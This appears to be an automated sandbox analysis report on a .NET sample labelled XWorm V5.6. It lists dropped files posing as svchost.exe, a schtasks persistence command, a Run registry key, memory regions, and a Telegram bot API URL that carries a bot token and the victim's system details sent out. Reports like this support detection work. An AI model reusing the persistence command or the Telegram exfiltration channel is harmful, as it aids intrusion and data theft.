Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
WV7Gj9lJ7W.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:05:05
2024, mtime=Sat Nov 23 19:05:05 2024, atime=Sat Nov 23 19:05:05 2024, length=85504, window=hide
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\WV7Gj9lJ7W.exe
|
"C:\Users\user\Desktop\WV7Gj9lJ7W.exe"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
"C:\Users\user\AppData\Local\Temp\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
"C:\Users\user\AppData\Local\Temp\svchost.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
C:\Users\user\AppData\Local\Temp\svchost.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
104.198.168.179
|
|
||
|
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer
|
149.154.167.220
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
127.0.0.1
|
|||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
||
|
api.telegram.org
|
149.154.167.220
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
104.198.168.179
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
svchost
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WV7Gj9lJ7W_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
12F51000
|
trusted library allocation
|
page read and write
|
|
|
|
2FB8000
|
trusted library allocation
|
page read and write
|
|
|
|
C02000
|
unkown
|
page readonly
|
|
|
|
2F51000
|
trusted library allocation
|
page read and write
|
|
|
|
730000
|
heap
|
page read and write
|
||
|
149D000
|
stack
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BDDA000
|
heap
|
page read and write
|
||
|
1BB3C000
|
stack
|
page read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
F02000
|
heap
|
page read and write
|
||
|
123C000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
651000
|
heap
|
page read and write
|
||
|
249F000
|
stack
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
6F1000
|
stack
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
118F000
|
heap
|
page read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
347B000
|
trusted library allocation
|
page read and write
|
||
|
1D0CA000
|
stack
|
page read and write
|
||
|
E37000
|
heap
|
page read and write
|
||
|
12618000
|
trusted library allocation
|
page read and write
|
||
|
1B602000
|
heap
|
page read and write
|
||
|
42D000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
2A3FA7E0000
|
heap
|
page read and write
|
||
|
1C7B4000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
648000
|
heap
|
page read and write
|
||
|
9FF000
|
stack
|
page read and write
|
||
|
842000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
E3B000
|
heap
|
page read and write
|
||
|
1241000
|
heap
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
1AC60000
|
heap
|
page execute and read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1680000
|
heap
|
page read and write
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
641000
|
heap
|
page read and write
|
||
|
1BE20000
|
heap
|
page read and write
|
||
|
12E51000
|
trusted library allocation
|
page read and write
|
||
|
613000
|
heap
|
page read and write
|
||
|
7FFD9B791000
|
trusted library allocation
|
page read and write
|
||
|
6C2000
|
heap
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
851000
|
heap
|
page read and write
|
||
|
1B933000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
2A3FA790000
|
heap
|
page read and write
|
||
|
124A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1163000
|
heap
|
page read and write
|
||
|
2A3FA83E000
|
heap
|
page read and write
|
||
|
7FF000
|
stack
|
page read and write
|
||
|
E99000
|
heap
|
page read and write
|
||
|
24AD000
|
trusted library allocation
|
page read and write
|
||
|
114A000
|
heap
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
24AF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
11DF000
|
stack
|
page read and write
|
||
|
2A3FA690000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
E75000
|
heap
|
page read and write
|
||
|
E22000
|
heap
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
502000
|
heap
|
page read and write
|
||
|
1AF4E000
|
stack
|
page read and write
|
||
|
628000
|
heap
|
page read and write
|
||
|
B02000
|
heap
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
1502000
|
heap
|
page read and write
|
||
|
2E11000
|
trusted library allocation
|
page read and write
|
||
|
1AE02000
|
heap
|
page read and write
|
||
|
2EAD000
|
trusted library allocation
|
page read and write
|
||
|
1B51C000
|
stack
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
30B1000
|
trusted library allocation
|
page read and write
|
||
|
EB4000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1C79F000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
12611000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
30A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
|
240000
|
unkown
|
page readonly
|
||
|
170D000
|
stack
|
page read and write
|
||
|
12E53000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
2A3FA770000
|
heap
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
FA6A9BE000
|
stack
|
page read and write
|
||
|
1A91E000
|
stack
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
1BDD5000
|
heap
|
page read and write
|
||
|
1C1FE000
|
stack
|
page read and write
|
||
|
1380000
|
heap
|
page execute and read and write
|
||
|
824000
|
heap
|
page read and write
|
||
|
1CCD0000
|
heap
|
page read and write
|
||
|
1C20E000
|
stack
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1602000
|
heap
|
page read and write
|
||
|
1193000
|
heap
|
page read and write
|
||
|
12C5000
|
heap
|
page read and write
|
||
|
6BE000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
1302000
|
heap
|
page read and write
|
||
|
11D0000
|
heap
|
page execute and read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
1B930000
|
heap
|
page read and write
|
||
|
1C2FE000
|
stack
|
page read and write
|
||
|
1BEFF000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
1B800000
|
heap
|
page execute and read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
1247000
|
heap
|
page read and write
|
||
|
4D8000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
1BDD7000
|
heap
|
page read and write
|
||
|
695000
|
heap
|
page read and write
|
||
|
1B4DD000
|
stack
|
page read and write
|
||
|
1C7F2000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
12E13000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
trusted library allocation
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
1685000
|
heap
|
page read and write
|
||
|
112C000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
12AD000
|
heap
|
page read and write
|
||
|
E9A000
|
heap
|
page read and write
|
||
|
9C0000
|
heap
|
page execute and read and write
|
||
|
1BD82000
|
heap
|
page read and write
|
||
|
5A0000
|
trusted library allocation
|
page read and write
|
||
|
1B2DA000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C000000
|
heap
|
page execute and read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4CC000
|
stack
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
DC1000
|
stack
|
page read and write
|
||
|
12E58000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
1C402000
|
heap
|
page read and write
|
||
|
1C753000
|
stack
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
124A5000
|
trusted library allocation
|
page read and write
|
||
|
1C40E000
|
stack
|
page read and write
|
||
|
1BC3E000
|
stack
|
page read and write
|
||
|
1CB70000
|
heap
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
821000
|
heap
|
page read and write
|
||
|
1BD40000
|
heap
|
page read and write
|
||
|
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23C0000
|
trusted library allocation
|
page read and write
|
||
|
1AD5E000
|
stack
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
124A3000
|
trusted library allocation
|
page read and write
|
||
|
1C1FE000
|
stack
|
page read and write
|
||
|
445000
|
heap
|
page read and write
|
||
|
11E0000
|
heap
|
page read and write
|
||
|
249E000
|
stack
|
page read and write
|
||
|
651000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
1BA0E000
|
stack
|
page read and write
|
||
|
1C6FE000
|
stack
|
page read and write
|
||
|
877000
|
heap
|
page read and write
|
||
|
451000
|
heap
|
page read and write
|
||
|
2EAF000
|
trusted library allocation
|
page read and write
|
||
|
24A1000
|
trusted library allocation
|
page read and write
|
||
|
124A1000
|
trusted library allocation
|
page read and write
|
||
|
118D000
|
heap
|
page read and write
|
||
|
1BC0F000
|
stack
|
page read and write
|
||
|
A02000
|
heap
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
12613000
|
trusted library allocation
|
page read and write
|
||
|
1ADD0000
|
heap
|
page read and write
|
||
|
1BE32000
|
heap
|
page read and write
|
||
|
159B000
|
stack
|
page read and write
|
||
|
2A3FA838000
|
heap
|
page read and write
|
||
|
1238000
|
heap
|
page read and write
|
||
|
2400000
|
heap
|
page execute and read and write
|
||
|
63E000
|
heap
|
page read and write
|
||
|
14FF000
|
stack
|
page read and write
|
||
|
1BCFE000
|
stack
|
page read and write
|
||
|
E13000
|
heap
|
page read and write
|
||
|
1B91B000
|
stack
|
page read and write
|
||
|
1C655000
|
stack
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C07E000
|
stack
|
page read and write
|
||
|
1BD42000
|
heap
|
page read and write
|
||
|
1302000
|
heap
|
page read and write
|
||
|
E3E000
|
heap
|
page read and write
|
||
|
1F1000
|
stack
|
page read and write
|
||
|
1395000
|
heap
|
page read and write
|
||
|
1C7DA000
|
heap
|
page read and write
|
||
|
12EA1000
|
trusted library allocation
|
page read and write
|
||
|
1C0FE000
|
stack
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
43C000
|
heap
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
7D0000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
902000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
845000
|
heap
|
page read and write
|
||
|
130A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
15FE000
|
stack
|
page read and write
|
||
|
2E0E000
|
stack
|
page read and write
|
||
|
2F40000
|
heap
|
page execute and read and write
|
||
|
69A000
|
heap
|
page read and write
|
||
|
1CECA000
|
stack
|
page read and write
|
||
|
1B31D000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1330000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
|
1AA8D000
|
stack
|
page read and write
|
||
|
2EA1000
|
trusted library allocation
|
page read and write
|
||
|
49A000
|
heap
|
page read and write
|
||
|
63E000
|
heap
|
page read and write
|
||
|
643000
|
heap
|
page read and write
|
||
|
1BA3D000
|
stack
|
page read and write
|
||
|
7F0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B791000
|
trusted library allocation
|
page read and write
|
||
|
24AD000
|
trusted library allocation
|
page read and write
|
||
|
30AF000
|
trusted library allocation
|
page read and write
|
||
|
2E21000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
12E11000
|
trusted library allocation
|
page read and write
|
||
|
D02000
|
heap
|
page read and write
|
||
|
1222000
|
heap
|
page read and write
|
||
|
7B0000
|
trusted library allocation
|
page read and write
|
||
|
FA6A93E000
|
unkown
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
8B3000
|
heap
|
page read and write
|
||
|
1C9CE000
|
stack
|
page read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
23E0000
|
trusted library allocation
|
page read and write
|
||
|
191E000
|
stack
|
page read and write
|
||
|
EC5000
|
heap
|
page read and write
|
||
|
A02000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
E2D000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A5000
|
trusted library allocation
|
page read and write
|
||
|
702000
|
heap
|
page read and write
|
||
|
813000
|
heap
|
page read and write
|
||
|
BCF000
|
stack
|
page read and write
|
||
|
FA6A8B9000
|
stack
|
page read and write
|
||
|
F02000
|
heap
|
page read and write
|
||
|
1402000
|
heap
|
page read and write
|
||
|
1BE23000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
1B802000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page execute and read and write
|
||
|
1CFCE000
|
stack
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C0000
|
heap
|
page execute and read and write
|
||
|
8C4000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
2A3FA7E5000
|
heap
|
page read and write
|
||
|
1213000
|
heap
|
page read and write
|
||
|
1C17C000
|
stack
|
page read and write
|
||
|
4B5000
|
heap
|
page read and write
|
||
|
6C7000
|
heap
|
page read and write
|
||
|
9DF000
|
stack
|
page read and write
|
||
|
B02000
|
heap
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
6D6000
|
heap
|
page read and write
|
||
|
1BDDD000
|
heap
|
page read and write
|
||
|
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B95F000
|
stack
|
page read and write
|
||
|
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
960000
|
trusted library allocation
|
page read and write
|
||
|
1AF80000
|
trusted library allocation
|
page read and write
|
||
|
677000
|
heap
|
page read and write
|
||
|
309F000
|
stack
|
page read and write
|
||
|
E45000
|
heap
|
page read and write
|
||
|
1CBC0000
|
heap
|
page read and write
|
||
|
E41000
|
heap
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
E25000
|
heap
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
6C4000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
83C000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
12CF000
|
stack
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
12E18000
|
trusted library allocation
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
1BA02000
|
heap
|
page read and write
|
||
|
2611000
|
trusted library allocation
|
page read and write
|
||
|
2EB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1670000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
1C53C000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
12EA8000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
1BD46000
|
heap
|
page read and write
|
||
|
1D1C8000
|
stack
|
page read and write
|
||
|
131E000
|
stack
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
1BAFF000
|
stack
|
page read and write
|
||
|
391000
|
stack
|
page read and write
|
||
|
2A3FA830000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
1AE02000
|
heap
|
page read and write
|
||
|
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
|
678000
|
heap
|
page read and write
|
||
|
2E61000
|
trusted library allocation
|
page read and write
|
||
|
580000
|
trusted library allocation
|
page read and write
|
||
|
E42000
|
heap
|
page read and write
|
||
|
645000
|
heap
|
page read and write
|
||
|
C18000
|
unkown
|
page readonly
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
62D000
|
heap
|
page read and write
|
||
|
1202000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
321D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1126000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1BB0E000
|
stack
|
page read and write
|
||
|
24A1000
|
trusted library allocation
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
130A8000
|
trusted library allocation
|
page read and write
|
||
|
1C0FE000
|
stack
|
page read and write
|
||
|
1143000
|
heap
|
page read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E5D000
|
trusted library allocation
|
page read and write
|
||
|
130A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
2E1F000
|
trusted library allocation
|
page read and write
|
||
|
EC2000
|
heap
|
page read and write
|
||
|
E2C000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
1BDFE000
|
stack
|
page read and write
|
||
|
1110000
|
heap
|
page read and write
|
||
|
1C30E000
|
stack
|
page read and write
|
||
|
D51000
|
stack
|
page read and write
|
||
|
1AE02000
|
heap
|
page read and write
|
||
|
441000
|
heap
|
page read and write
|
||
|
1277000
|
heap
|
page read and write
|
||
|
2E51000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
1A91D000
|
stack
|
page read and write
|
||
|
7FFD9B7A3000
|
trusted library allocation
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
181E000
|
stack
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
1350000
|
heap
|
page read and write
|
||
|
1330000
|
heap
|
page read and write
|
||
|
1CA2F000
|
stack
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
1D5CC000
|
stack
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
8B5000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
124A8000
|
trusted library allocation
|
page read and write
|
||
|
128E000
|
stack
|
page read and write
|
||
|
14FE000
|
stack
|
page read and write
|
||
|
1B90F000
|
stack
|
page read and write
|
||
|
1170000
|
trusted library allocation
|
page read and write
|
||
|
2E5F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
63C000
|
heap
|
page read and write
|
||
|
E3C000
|
heap
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
82C000
|
heap
|
page read and write
|
||
|
8FF000
|
stack
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
C02000
|
heap
|
page read and write
|
||
|
24B1000
|
trusted library allocation
|
page read and write
|
||
|
E38000
|
heap
|
page read and write
|
||
|
646000
|
heap
|
page read and write
|
||
|
1AD6F000
|
stack
|
page read and write
|
||
|
250F000
|
stack
|
page read and write
|
||
|
E21000
|
heap
|
page read and write
|
||
|
7FFD9B7B4000
|
trusted library allocation
|
page read and write
|
||
|
6BC000
|
heap
|
page read and write
|
||
|
6AF000
|
heap
|
page read and write
|
||
|
1251000
|
heap
|
page read and write
|
||
|
122D000
|
heap
|
page read and write
|
||
|
2E9E000
|
stack
|
page read and write
|
||
|
8FF000
|
stack
|
page read and write
|
||
|
E45000
|
heap
|
page read and write
|
||
|
1000000
|
heap
|
page read and write
|
||
|
64B000
|
heap
|
page read and write
|
||
|
B02000
|
heap
|
page read and write
|
||
|
1BD56000
|
heap
|
page read and write
|
||
|
B71000
|
stack
|
page read and write
|
||
|
7FF4A4C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1320000
|
trusted library allocation
|
page read and write
|
||
|
1C10E000
|
stack
|
page read and write
|
||
|
1C7B6000
|
heap
|
page read and write
|
||
|
E13000
|
heap
|
page read and write
|
||
|
12EA3000
|
trusted library allocation
|
page read and write
|
||
|
C00000
|
unkown
|
page readonly
|
||
|
1CA40000
|
heap
|
page execute and read and write
|
||
|
124A3000
|
trusted library allocation
|
page read and write
|
||
|
613000
|
heap
|
page read and write
|
||
|
2E1D000
|
trusted library allocation
|
page read and write
|
||
|
1A3F000
|
stack
|
page read and write
|
||
|
899000
|
heap
|
